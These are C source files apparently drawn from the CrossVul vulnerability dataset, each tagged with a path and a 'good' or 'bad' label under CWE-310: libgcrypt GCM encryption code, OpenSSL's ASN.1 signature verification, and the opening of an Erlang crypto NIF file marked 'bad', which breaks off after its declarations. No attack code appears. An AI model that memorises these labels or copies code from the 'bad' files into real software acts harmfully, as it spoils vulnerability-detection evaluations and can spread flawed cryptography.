if (err != 0)
return err;
do_ghash_buf(c, c->u_mode.gcm.u_tag.tag, outbuf, currlen, 0);
outbuf += currlen;
inbuf += currlen;
outbuflen -= currlen;
inbuflen -= currlen;
}
return 0;
}
gcry_err_code_t
_gcry_cipher_gcm_decrypt (gcry_cipher_hd_t c,
byte *outbuf, size_t outbuflen,
const byte *inbuf, size_t inbuflen)
{
static const unsigned char zerobuf[MAX_BLOCKSIZE];
gcry_err_code_t err;
if (c->spec->blocksize != GCRY_GCM_BLOCK_LEN)
return GPG_ERR_CIPHER_ALGO;
if (outbuflen < inbuflen)
return GPG_ERR_BUFFER_TOO_SHORT;
if (c->u_mode.gcm.datalen_over_limits)
return GPG_ERR_INV_LENGTH;
if (c->marks.tag
|| c->u_mode.gcm.ghash_data_finalized
|| !c->u_mode.gcm.ghash_fn)
return GPG_ERR_INV_STATE;
if (!c->marks.iv)
_gcry_cipher_gcm_setiv (c, zerobuf, GCRY_GCM_BLOCK_LEN);
if (!c->u_mode.gcm.ghash_aad_finalized)
{
/* Start of decryption marks end of AAD stream. */
do_ghash_buf(c, c->u_mode.gcm.u_tag.tag, NULL, 0, 1);
c->u_mode.gcm.ghash_aad_finalized = 1;
}
gcm_bytecounter_add(c->u_mode.gcm.datalen, inbuflen);
if (!gcm_check_datalen(c->u_mode.gcm.datalen))
{
c->u_mode.gcm.datalen_over_limits = 1;
return GPG_ERR_INV_LENGTH;
}
while (inbuflen)
{
size_t currlen = inbuflen;
/* Since checksumming is done before decryption, process input in
* 24KiB chunks to keep data loaded in L1 cache for decryption. */
if (currlen > 24 * 1024)
currlen = 24 * 1024;
do_ghash_buf(c, c->u_mode.gcm.u_tag.tag, inbuf, currlen, 0);
err = gcm_ctr_encrypt(c, outbuf, outbuflen, inbuf, currlen);
if (err)
return err;
outbuf += currlen;
inbuf += currlen;
outbuflen -= currlen;
inbuflen -= currlen;
}
return 0;
}
gcry_err_code_t
_gcry_cipher_gcm_authenticate (gcry_cipher_hd_t c,
const byte * aadbuf, size_t aadbuflen)
{
static const unsigned char zerobuf[MAX_BLOCKSIZE];
if (c->spec->blocksize != GCRY_GCM_BLOCK_LEN)
return GPG_ERR_CIPHER_ALGO;
if (c->u_mode.gcm.datalen_over_limits)
return GPG_ERR_INV_LENGTH;
if (c->marks.tag
|| c->u_mode.gcm.ghash_aad_finalized
|| c->u_mode.gcm.ghash_data_finalized
|| !c->u_mode.gcm.ghash_fn)
return GPG_ERR_INV_STATE;
if (!c->marks.iv)
_gcry_cipher_gcm_setiv (c, zerobuf, GCRY_GCM_BLOCK_LEN);
gcm_bytecounter_add(c->u_mode.gcm.aadlen, aadbuflen);
if (!gcm_check_aadlen_or_ivlen(c->u_mode.gcm.aadlen))
{
c->u_mode.gcm.datalen_over_limits = 1;
return GPG_ERR_INV_LENGTH;
}
do_ghash_buf(c, c->u_mode.gcm.u_tag.tag, aadbuf, aadbuflen, 0);
return 0;
}
void
_gcry_cipher_gcm_setkey (gcry_cipher_hd_t c)
{
memset (c->u_mode.gcm.u_ghash_key.key, 0, GCRY_GCM_BLOCK_LEN);
c->spec->encrypt (&c->context.c, c->u_mode.gcm.u_ghash_key.key,
c->u_mode.gcm.u_ghash_key.key);
setupM (c);
}
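/* _gcry_cipher_gcm_setkey() above derives the GHASH key as H = E_K(0^128),
 * the all-zero block encrypted under the cipher key.  _gcry_cipher_gcm_initiv()
 * below then builds the pre-counter block: a 96-bit IV is used directly with
 * a 32-bit counter value of 1 appended, while any other IV length is run
 * through GHASH together with a 64-bit encoding of its bit length, as
 * specified in SP 800-38D. */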
static gcry_err_code_t
_gcry_cipher_gcm_initiv (gcry_cipher_hd_t c, const byte *iv, size_t ivlen)
{
memset (c->u_mode.gcm.aadlen, 0, sizeof(c->u_mode.gcm.aadlen));
memset (c->u_mode.gcm.datalen, 0, sizeof(c->u_mode.gcm.datalen));
memset (c->u_mode.gcm.u_tag.tag, 0, GCRY_GCM_BLOCK_LEN);
c->u_mode.gcm.datalen_over_limits = 0;
c->u_mode.gcm.ghash_data_finalized = 0;
c->u_mode.gcm.ghash_aad_finalized = 0;
if (ivlen == 0)
return GPG_ERR_INV_LENGTH;
if (ivlen != GCRY_GCM_BLOCK_LEN - 4)
{
u32 iv_bytes[2] = {0, 0};
u32 bitlengths[2][2];
if (!c->u_mode.gcm.ghash_fn)
return GPG_ERR_INV_STATE;
memset(c->u_ctr.ctr, 0, GCRY_GCM_BLOCK_LEN);
gcm_bytecounter_add(iv_bytes, ivlen);
if (!gcm_check_aadlen_or_ivlen(iv_bytes))
{
c->u_mode.gcm.datalen_over_limits = 1;
return GPG_ERR_INV_LENGTH;
}
do_ghash_buf(c, c->u_ctr.ctr, iv, ivlen, 1);
/* iv length, 64-bit */
bitlengths[1][1] = be_bswap32(iv_bytes[0] << 3);
bitlengths[1][0] = be_bswap32((iv_bytes[0] >> 29) |
(iv_bytes[1] << 3));
/* zeros, 64-bit */
bitlengths[0][1] = 0;
bitlengths[0][0] = 0;
do_ghash_buf(c, c->u_ctr.ctr, (byte*)bitlengths, GCRY_GCM_BLOCK_LEN, 1);
wipememory (iv_bytes, sizeof iv_bytes);
wipememory (bitlengths, sizeof bitlengths);
}
else
{
/* 96-bit IV is handled differently. */
memcpy (c->u_ctr.ctr, iv, ivlen);
c->u_ctr.ctr[12] = c->u_ctr.ctr[13] = c->u_ctr.ctr[14] = 0;
c->u_ctr.ctr[15] = 1;
}
c->spec->encrypt (&c->context.c, c->u_mode.gcm.tagiv, c->u_ctr.ctr);
gcm_add32_be128 (c->u_ctr.ctr, 1);
c->unused = 0;
c->marks.iv = 1;
c->marks.tag = 0;
return 0;
}
gcry_err_code_t
_gcry_cipher_gcm_setiv (gcry_cipher_hd_t c, const byte *iv, size_t ivlen)
{
c->marks.iv = 0;
c->marks.tag = 0;
c->u_mode.gcm.disallow_encryption_because_of_setiv_in_fips_mode = 0;
if (fips_mode ())
{
/* Direct invocation of GCM setiv in FIPS mode disables encryption. */
c->u_mode.gcm.disallow_encryption_because_of_setiv_in_fips_mode = 1;
}
return _gcry_cipher_gcm_initiv (c, iv, ivlen);
}
#if 0 && TODO
gcry_err_code_t
_gcry_cipher_gcm_geniv (gcry_cipher_hd_t c,
byte *ivout, size_t ivoutlen, const byte *nonce,
size_t noncelen)
{
/* nonce: user provided part (might be null) */
/* noncelen: check if proper length (if nonce not null) */
/* ivout: iv used to initialize gcm, output to user */
/* ivoutlen: check correct size */
byte iv[IVLEN];
if (!ivout)
return GPG_ERR_INV_ARG;
if (ivoutlen != IVLEN)
return GPG_ERR_INV_LENGTH;
if (nonce != NULL && !is_nonce_ok_len(noncelen))
return GPG_ERR_INV_ARG;
gcm_generate_iv(iv, nonce, noncelen);
c->marks.iv = 0;
c->marks.tag = 0;
c->u_mode.gcm.disallow_encryption_because_of_setiv_in_fips_mode = 0;
_gcry_cipher_gcm_initiv (c, iv, IVLEN);
buf_cpy(ivout, iv, IVLEN);
wipememory(iv, sizeof(iv));
  return 0;
}
#endif
static int
is_tag_length_valid(size_t taglen)
{
switch (taglen)
{
/* Allowed tag lengths from NIST SP 800-38D. */
case 128 / 8: /* GCRY_GCM_BLOCK_LEN */
case 120 / 8:
case 112 / 8:
case 104 / 8:
case 96 / 8:
case 64 / 8:
case 32 / 8:
return 1;
default:
return 0;
}
}
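/* Tag computation below follows the GCM definition: the final tag is
 * E_K(pre-counter block) XOR GHASH(AAD || ciphertext || 64-bit bit lengths
 * of each), truncated to the requested length.  c->u_mode.gcm.tagiv holds
 * the encrypted pre-counter block saved by _gcry_cipher_gcm_initiv(). */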
static gcry_err_code_t
_gcry_cipher_gcm_tag (gcry_cipher_hd_t c,
byte * outbuf, size_t outbuflen, int check)
{
if (!(is_tag_length_valid (outbuflen) || outbuflen >= GCRY_GCM_BLOCK_LEN))
return GPG_ERR_INV_LENGTH;
if (c->u_mode.gcm.datalen_over_limits)
return GPG_ERR_INV_LENGTH;
if (!c->marks.tag)
{
u32 bitlengths[2][2];
if (!c->u_mode.gcm.ghash_fn)
return GPG_ERR_INV_STATE;
/* aad length */
bitlengths[0][1] = be_bswap32(c->u_mode.gcm.aadlen[0] << 3);
bitlengths[0][0] = be_bswap32((c->u_mode.gcm.aadlen[0] >> 29) |
(c->u_mode.gcm.aadlen[1] << 3));
/* data length */
bitlengths[1][1] = be_bswap32(c->u_mode.gcm.datalen[0] << 3);
bitlengths[1][0] = be_bswap32((c->u_mode.gcm.datalen[0] >> 29) |
(c->u_mode.gcm.datalen[1] << 3));
/* Finalize data-stream. */
do_ghash_buf(c, c->u_mode.gcm.u_tag.tag, NULL, 0, 1);
c->u_mode.gcm.ghash_aad_finalized = 1;
c->u_mode.gcm.ghash_data_finalized = 1;
/* Add bitlengths to tag. */
do_ghash_buf(c, c->u_mode.gcm.u_tag.tag, (byte*)bitlengths,
GCRY_GCM_BLOCK_LEN, 1);
cipher_block_xor (c->u_mode.gcm.u_tag.tag, c->u_mode.gcm.tagiv,
c->u_mode.gcm.u_tag.tag, GCRY_GCM_BLOCK_LEN);
c->marks.tag = 1;
wipememory (bitlengths, sizeof (bitlengths));
wipememory (c->u_mode.gcm.macbuf, GCRY_GCM_BLOCK_LEN);
wipememory (c->u_mode.gcm.tagiv, GCRY_GCM_BLOCK_LEN);
wipememory (c->u_mode.gcm.aadlen, sizeof (c->u_mode.gcm.aadlen));
wipememory (c->u_mode.gcm.datalen, sizeof (c->u_mode.gcm.datalen));
}
if (!check)
{
if (outbuflen > GCRY_GCM_BLOCK_LEN)
outbuflen = GCRY_GCM_BLOCK_LEN;
/* NB: We already checked that OUTBUF is large enough to hold
* the result or has valid truncated length. */
memcpy (outbuf, c->u_mode.gcm.u_tag.tag, outbuflen);
}
else
{
/* OUTBUFLEN gives the length of the user supplied tag in OUTBUF
* and thus we need to compare its length first. */
if (!is_tag_length_valid (outbuflen)
|| !buf_eq_const (outbuf, c->u_mode.gcm.u_tag.tag, outbuflen))
return GPG_ERR_CHECKSUM;
}
return 0;
}
gcry_err_code_t
_gcry_cipher_gcm_get_tag (gcry_cipher_hd_t c, unsigned char *outtag,
size_t taglen)
{
/* Outputting authentication tag is part of encryption. */
if (c->u_mode.gcm.disallow_encryption_because_of_setiv_in_fips_mode)
return GPG_ERR_INV_STATE;
return _gcry_cipher_gcm_tag (c, outtag, taglen, 0);
}
gcry_err_code_t
_gcry_cipher_gcm_check_tag (gcry_cipher_hd_t c, const unsigned char *intag,
size_t taglen)
{
return _gcry_cipher_gcm_tag (c, (unsigned char *) intag, taglen, 1);
}
| ./CrossVul/dataset_final_sorted/CWE-310/c/good_892_0 |
crossvul-cpp_data_good_2309_1 | /* crypto/asn1/a_verify.c */
/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young (eay@cryptsoft.com).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
 * the following conditions are adhered to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson (tjh@cryptsoft.com).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young (eay@cryptsoft.com)"
 * The word 'cryptographic' can be left out if the routines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
 * The licence and distribution terms for any publicly available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
#include <stdio.h>
#include <time.h>
#include "cryptlib.h"
#ifndef NO_SYS_TYPES_H
# include <sys/types.h>
#endif
#include <openssl/bn.h>
#include <openssl/x509.h>
#include <openssl/objects.h>
#include <openssl/buffer.h>
#include <openssl/evp.h>
#include "asn1_locl.h"
#ifndef NO_ASN1_OLD
int ASN1_verify(i2d_of_void *i2d, X509_ALGOR *a, ASN1_BIT_STRING *signature,
char *data, EVP_PKEY *pkey)
{
EVP_MD_CTX ctx;
const EVP_MD *type;
unsigned char *p,*buf_in=NULL;
int ret= -1,i,inl;
EVP_MD_CTX_init(&ctx);
i=OBJ_obj2nid(a->algorithm);
type=EVP_get_digestbyname(OBJ_nid2sn(i));
if (type == NULL)
{
ASN1err(ASN1_F_ASN1_VERIFY,ASN1_R_UNKNOWN_MESSAGE_DIGEST_ALGORITHM);
goto err;
}
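	/* The low three bits of an ASN1_STRING's flags hold the number of
	 * unused bits when the string is a BIT STRING, so this check rejects
	 * signatures whose BIT STRING encoding claims trailing unused bits. */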
if (signature->type == V_ASN1_BIT_STRING && signature->flags & 0x7)
{
ASN1err(ASN1_F_ASN1_VERIFY, ASN1_R_INVALID_BIT_STRING_BITS_LEFT);
goto err;
}
inl=i2d(data,NULL);
buf_in=OPENSSL_malloc((unsigned int)inl);
if (buf_in == NULL)
{
ASN1err(ASN1_F_ASN1_VERIFY,ERR_R_MALLOC_FAILURE);
goto err;
}
p=buf_in;
i2d(data,&p);
ret=
EVP_VerifyInit_ex(&ctx,type, NULL)
&& EVP_VerifyUpdate(&ctx,(unsigned char *)buf_in,inl);
OPENSSL_cleanse(buf_in,(unsigned int)inl);
OPENSSL_free(buf_in);
if (!ret)
{
ASN1err(ASN1_F_ASN1_VERIFY,ERR_R_EVP_LIB);
goto err;
}
ret = -1;
if (EVP_VerifyFinal(&ctx,(unsigned char *)signature->data,
(unsigned int)signature->length,pkey) <= 0)
{
ASN1err(ASN1_F_ASN1_VERIFY,ERR_R_EVP_LIB);
ret=0;
goto err;
}
/* we don't need to zero the 'ctx' because we just checked
* public information */
/* memset(&ctx,0,sizeof(ctx)); */
ret=1;
err:
EVP_MD_CTX_cleanup(&ctx);
return(ret);
}
#endif
int ASN1_item_verify(const ASN1_ITEM *it, X509_ALGOR *a,
ASN1_BIT_STRING *signature, void *asn, EVP_PKEY *pkey)
{
EVP_MD_CTX ctx;
unsigned char *buf_in=NULL;
int ret= -1,inl;
int mdnid, pknid;
if (!pkey)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY, ERR_R_PASSED_NULL_PARAMETER);
return -1;
}
if (signature->type == V_ASN1_BIT_STRING && signature->flags & 0x7)
{
ASN1err(ASN1_F_ASN1_VERIFY, ASN1_R_INVALID_BIT_STRING_BITS_LEFT);
return -1;
}
EVP_MD_CTX_init(&ctx);
/* Convert signature OID into digest and public key OIDs */
if (!OBJ_find_sigid_algs(OBJ_obj2nid(a->algorithm), &mdnid, &pknid))
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ASN1_R_UNKNOWN_SIGNATURE_ALGORITHM);
goto err;
}
if (mdnid == NID_undef)
{
if (!pkey->ameth || !pkey->ameth->item_verify)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ASN1_R_UNKNOWN_SIGNATURE_ALGORITHM);
goto err;
}
ret = pkey->ameth->item_verify(&ctx, it, asn, a,
signature, pkey);
		/* A return value of 2 means carry on; anything else means we
		 * exit straight away: either a fatal error occurred or the
		 * underlying verification routine has handled all
		 * verification itself.
		 */
if (ret != 2)
goto err;
ret = -1;
}
else
{
const EVP_MD *type;
type=EVP_get_digestbynid(mdnid);
if (type == NULL)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ASN1_R_UNKNOWN_MESSAGE_DIGEST_ALGORITHM);
goto err;
}
/* Check public key OID matches public key type */
if (EVP_PKEY_type(pknid) != pkey->ameth->pkey_id)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ASN1_R_WRONG_PUBLIC_KEY_TYPE);
goto err;
}
if (!EVP_DigestVerifyInit(&ctx, NULL, type, NULL, pkey))
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ERR_R_EVP_LIB);
ret=0;
goto err;
}
}
inl = ASN1_item_i2d(asn, &buf_in, it);
if (buf_in == NULL)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ERR_R_MALLOC_FAILURE);
goto err;
}
ret = EVP_DigestVerifyUpdate(&ctx,buf_in,inl);
OPENSSL_cleanse(buf_in,(unsigned int)inl);
OPENSSL_free(buf_in);
if (!ret)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ERR_R_EVP_LIB);
goto err;
}
ret = -1;
if (EVP_DigestVerifyFinal(&ctx,signature->data,
(size_t)signature->length) <= 0)
{
ASN1err(ASN1_F_ASN1_ITEM_VERIFY,ERR_R_EVP_LIB);
ret=0;
goto err;
}
/* we don't need to zero the 'ctx' because we just checked
* public information */
/* memset(&ctx,0,sizeof(ctx)); */
ret=1;
err:
EVP_MD_CTX_cleanup(&ctx);
return(ret);
}
| ./CrossVul/dataset_final_sorted/CWE-310/c/good_2309_1 |
crossvul-cpp_data_bad_3428_0 | /*
* %CopyrightBegin%
*
* Copyright Ericsson AB 2010-2011. All Rights Reserved.
*
* The contents of this file are subject to the Erlang Public License,
* Version 1.1, (the "License"); you may not use this file except in
* compliance with the License. You should have received a copy of the
* Erlang Public License along with this software. If not, it can be
* retrieved online at http://www.erlang.org/.
*
* Software distributed under the License is distributed on an "AS IS"
* basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See
* the License for the specific language governing rights and limitations
* under the License.
*
* %CopyrightEnd%
*/
/*
* Purpose: Dynamically loadable NIF library for cryptography.
* Based on OpenSSL.
*/
#ifdef __WIN32__
#include <windows.h>
#endif
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include "erl_nif.h"
#define OPENSSL_THREAD_DEFINES
#include <openssl/opensslconf.h>
#include <openssl/crypto.h>
#include <openssl/des.h>
/* #include <openssl/idea.h> This is not supported by the OpenSSL version that OTP requires */
#include <openssl/dsa.h>
#include <openssl/rsa.h>
#include <openssl/aes.h>
#include <openssl/md5.h>
#include <openssl/md4.h>
#include <openssl/sha.h>
#include <openssl/bn.h>
#include <openssl/objects.h>
#include <openssl/rc4.h>
#include <openssl/rc2.h>
#include <openssl/blowfish.h>
#include <openssl/rand.h>
#ifdef VALGRIND
# include <valgrind/memcheck.h>
/* libcrypto mixes supplied buffer contents into its entropy pool,
which makes valgrind complain about the use of uninitialized data.
We use this valgrind "request" to make sure that no such seemingly
undefined data is returned.
*/
# define ERL_VALGRIND_MAKE_MEM_DEFINED(ptr,size) \
VALGRIND_MAKE_MEM_DEFINED(ptr,size)
# define ERL_VALGRIND_ASSERT_MEM_DEFINED(Ptr,Size) \
do { \
int __erl_valgrind_mem_defined = VALGRIND_CHECK_MEM_IS_DEFINED((Ptr),(Size)); \
if (__erl_valgrind_mem_defined != 0) { \
	    fprintf(stderr,"\r\n####### VALGRIND_ASSERT(%p,%ld) failed at %s:%d\r\n", \
(Ptr),(long)(Size), __FILE__, __LINE__); \
abort(); \
} \
} while (0)
#else
# define ERL_VALGRIND_MAKE_MEM_DEFINED(ptr,size)
# define ERL_VALGRIND_ASSERT_MEM_DEFINED(ptr,size)
#endif
#ifdef DEBUG
# define ASSERT(e) \
((void) ((e) ? 1 : (fprintf(stderr,"Assert '%s' failed at %s:%d\n",\
#e, __FILE__, __LINE__), abort(), 0)))
#else
# define ASSERT(e) ((void) 1)
#endif
#ifdef __GNUC__
# define INLINE __inline__
#elif defined(__WIN32__)
# define INLINE __forceinline
#else
# define INLINE
#endif
#define get_int32(s) ((((unsigned char*) (s))[0] << 24) | \
(((unsigned char*) (s))[1] << 16) | \
(((unsigned char*) (s))[2] << 8) | \
(((unsigned char*) (s))[3]))
#define put_int32(s,i) \
{ (s)[0] = (char)(((i) >> 24) & 0xff);\
(s)[1] = (char)(((i) >> 16) & 0xff);\
(s)[2] = (char)(((i) >> 8) & 0xff);\
(s)[3] = (char)((i) & 0xff);\
}
/* NIF interface declarations */
static int load(ErlNifEnv* env, void** priv_data, ERL_NIF_TERM load_info);
static int reload(ErlNifEnv* env, void** priv_data, ERL_NIF_TERM load_info);
static int upgrade(ErlNifEnv* env, void** priv_data, void** old_priv_data, ERL_NIF_TERM load_info);
static void unload(ErlNifEnv* env, void* priv_data);
/* The NIFs: */
static ERL_NIF_TERM info_lib(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM md5(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM md5_init(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM md5_update(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM md5_final(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM sha(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM sha_init(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM sha_update(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM sha_final(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM md4(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM md4_init(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM md4_update(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM md4_final(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM md5_mac_n(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM sha_mac_n(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM des_cbc_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM des_ecb_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM des_ede3_cbc_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM aes_cfb_128_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM aes_ctr_encrypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rand_bytes_1(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rand_bytes_3(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rand_uniform_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM mod_exp_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM dss_verify(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rsa_verify(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM aes_cbc_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM exor(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rc4_encrypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rc4_set_key(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rc4_encrypt_with_state(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rc2_40_cbc_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rsa_sign_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM dss_sign_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rsa_public_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM rsa_private_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM dh_generate_parameters_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM dh_check(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM dh_generate_key_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM dh_compute_key_nif(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM bf_cfb64_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM bf_cbc_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM bf_ecb_crypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
static ERL_NIF_TERM blowfish_ofb64_encrypt(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[]);
/* openssl callbacks */
#ifdef OPENSSL_THREADS
static void locking_function(int mode, int n, const char *file, int line);
static unsigned long id_function(void);
static struct CRYPTO_dynlock_value* dyn_create_function(const char *file,
int line);
static void dyn_lock_function(int mode, struct CRYPTO_dynlock_value* ptr,
const char *file, int line);
static void dyn_destroy_function(struct CRYPTO_dynlock_value *ptr,
const char *file, int line);
#endif /* OPENSSL_THREADS */
/* helpers */
static void hmac_md5(unsigned char *key, int klen,
unsigned char *dbuf, int dlen,
unsigned char *hmacbuf);
static void hmac_sha1(unsigned char *key, int klen,
unsigned char *dbuf, int dlen,
unsigned char *hmacbuf);
static int library_refc = 0; /* number of users of this dynamic library */
static ErlNifFunc nif_funcs[] = {
{"info_lib", 0, info_lib},
{"md5", 1, md5},
{"md5_init", 0, md5_init},
{"md5_update", 2, md5_update},
{"md5_final", 1, md5_final},
{"sha", 1, sha},
{"sha_init", 0, sha_init},
{"sha_update", 2, sha_update},
{"sha_final", 1, sha_final},
{"md4", 1, md4},
{"md4_init", 0, md4_init},
{"md4_update", 2, md4_update},
{"md4_final", 1, md4_final},
{"md5_mac_n", 3, md5_mac_n},
{"sha_mac_n", 3, sha_mac_n},
{"des_cbc_crypt", 4, des_cbc_crypt},
{"des_ecb_crypt", 3, des_ecb_crypt},
{"des_ede3_cbc_crypt", 6, des_ede3_cbc_crypt},
{"aes_cfb_128_crypt", 4, aes_cfb_128_crypt},
{"aes_ctr_encrypt", 3, aes_ctr_encrypt},
{"aes_ctr_decrypt", 3, aes_ctr_encrypt},
{"rand_bytes", 1, rand_bytes_1},
{"rand_bytes", 3, rand_bytes_3},
{"rand_uniform_nif", 2, rand_uniform_nif},
{"mod_exp_nif", 3, mod_exp_nif},
{"dss_verify", 4, dss_verify},
{"rsa_verify", 4, rsa_verify},
{"aes_cbc_crypt", 4, aes_cbc_crypt},
{"exor", 2, exor},
{"rc4_encrypt", 2, rc4_encrypt},
{"rc4_set_key", 1, rc4_set_key},
{"rc4_encrypt_with_state", 2, rc4_encrypt_with_state},
{"rc2_40_cbc_crypt", 4, rc2_40_cbc_crypt},
{"rsa_sign_nif", 3, rsa_sign_nif},
{"dss_sign_nif", 3, dss_sign_nif},
{"rsa_public_crypt", 4, rsa_public_crypt},
{"rsa_private_crypt", 4, rsa_private_crypt},
{"dh_generate_parameters_nif", 2, dh_generate_parameters_nif},
{"dh_check", 1, dh_check},
{"dh_generate_key_nif", 2, dh_generate_key_nif},
{"dh_compute_key_nif", 3, dh_compute_key_nif},
{"bf_cfb64_crypt", 4, bf_cfb64_crypt},
{"bf_cbc_crypt", 4, bf_cbc_crypt},
{"bf_ecb_crypt", 3, bf_ecb_crypt},
{"blowfish_ofb64_encrypt", 3, blowfish_ofb64_encrypt}
};
ERL_NIF_INIT(crypto,nif_funcs,load,reload,upgrade,unload)
#define MD5_CTX_LEN (sizeof(MD5_CTX))
#define MD5_LEN 16
#define MD5_LEN_96 12
#define MD4_CTX_LEN (sizeof(MD4_CTX))
#define MD4_LEN 16
#define SHA_CTX_LEN (sizeof(SHA_CTX))
#define SHA_LEN 20
#define SHA_LEN_96 12
#define HMAC_INT_LEN 64
#define HMAC_IPAD 0x36
#define HMAC_OPAD 0x5c
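/* HMAC_IPAD and HMAC_OPAD are the RFC 2104 padding constants.  HMAC is
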